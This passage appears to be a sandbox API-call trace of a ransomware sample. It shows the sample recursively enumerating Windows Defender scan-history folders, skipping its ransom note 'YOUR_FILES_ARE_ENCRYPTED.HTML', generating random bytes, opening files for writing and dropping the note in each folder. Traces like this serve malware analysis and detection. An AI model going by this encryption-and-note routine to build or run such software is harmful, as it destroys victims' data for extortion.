nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.264] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf46910b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="..", cAlternateFileName="")) returned 1 [0110.264] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd06b4edd, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="CacheManager", cAlternateFileName="CACHEM~1")) returned 1 [0110.264] StrStrIW (lpFirst="CacheManager", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.264] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned 76 [0110.264] GetProcessHeap () returned 0x600000 [0110.264] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.265] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" [0110.265] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*" [0110.265] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf25fdd6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x626838 [0110.265] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf25fdd6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0110.265] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd06b4edd, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x4e000, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="MpScanCache-0.bin", cAlternateFileName="MPSCAN~1.BIN")) returned 1 [0110.265] StrStrIW (lpFirst="MpScanCache-0.bin", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.265] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpScanCache-0.bin") returned 94 [0110.265] PathFindExtensionW (pszPath="MpScanCache-0.bin") returned=".bin" [0110.265] lstrlenW (lpString=".bin") returned 4 [0110.265] PathFindExtensionW (pszPath="MpScanCache-0.bin") returned=".bin" [0110.265] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0110.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpScanCache-0.bin" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpscancache-0.bin"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0110.265] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf25fdd6, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf25fdd6, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf264bbb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.265] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf25fdd6, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf25fdd6, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf264bbb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.265] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0110.266] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0110.266] GetProcessHeap () returned 0x600000 [0110.266] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\cachemanager\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.266] GetProcessHeap () returned 0x600000 [0110.266] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.266] GetProcessHeap () returned 0x600000 [0110.266] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.266] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="Mput", cAlternateFileName="")) returned 1 [0110.267] StrStrIW (lpFirst="Mput", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.267] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput") returned 68 [0110.267] GetProcessHeap () returned 0x600000 [0110.267] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.267] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput" [0110.267] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\*" [0110.268] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf42fae3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0110.268] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf42fae3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0110.268] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="MputHistory", cAlternateFileName="MPUTHI~1")) returned 1 [0110.268] StrStrIW (lpFirst="MputHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.268] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory") returned 80 [0110.268] GetProcessHeap () returned 0x600000 [0110.268] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0110.269] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory" [0110.269] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\*" [0110.269] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf428676, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName=".", cAlternateFileName="")) returned 0x626638 [0110.270] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf428676, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="..", cAlternateFileName="")) returned 1 [0110.270] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="00", cAlternateFileName="")) returned 1 [0110.270] StrStrIW (lpFirst="00", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.270] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00") returned 83 [0110.270] GetProcessHeap () returned 0x600000 [0110.270] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.270] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00" [0110.270] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00\\*" [0110.270] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf27ac07, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.270] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf27ac07, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.271] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="192", cAlternateFileName="")) returned 1 [0110.271] StrStrIW (lpFirst="192", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.271] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00\\192") returned 87 [0110.271] PathFindExtensionW (pszPath="192") returned="" [0110.271] lstrlenW (lpString="") returned 0 [0110.271] PathFindExtensionW (pszPath="192") returned="" [0110.271] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf27ac07, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf27ac07, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf27e608, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.271] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf27ac07, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf27ac07, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf27e608, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.271] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.271] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.271] GetProcessHeap () returned 0x600000 [0110.271] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\00\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.271] GetProcessHeap () returned 0x600000 [0110.271] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.271] GetProcessHeap () returned 0x600000 [0110.271] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.272] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="01", cAlternateFileName="")) returned 1 [0110.272] StrStrIW (lpFirst="01", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.273] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01") returned 83 [0110.273] GetProcessHeap () returned 0x600000 [0110.273] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.274] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01" [0110.274] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01\\*" [0110.274] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf289602, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626738 [0110.274] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf289602, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.274] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="198", cAlternateFileName="")) returned 1 [0110.274] StrStrIW (lpFirst="198", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.274] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01\\198") returned 87 [0110.274] PathFindExtensionW (pszPath="198") returned="" [0110.274] lstrlenW (lpString="") returned 0 [0110.274] PathFindExtensionW (pszPath="198") returned="" [0110.274] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="263", cAlternateFileName="")) returned 1 [0110.274] StrStrIW (lpFirst="263", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.274] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01\\263") returned 87 [0110.274] PathFindExtensionW (pszPath="263") returned="" [0110.274] lstrlenW (lpString="") returned 0 [0110.274] PathFindExtensionW (pszPath="263") returned="" [0110.274] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="271", cAlternateFileName="")) returned 1 [0110.275] StrStrIW (lpFirst="271", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.275] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01\\271") returned 87 [0110.275] PathFindExtensionW (pszPath="271") returned="" [0110.275] lstrlenW (lpString="") returned 0 [0110.275] PathFindExtensionW (pszPath="271") returned="" [0110.275] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf288254, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf288254, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf28d248, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 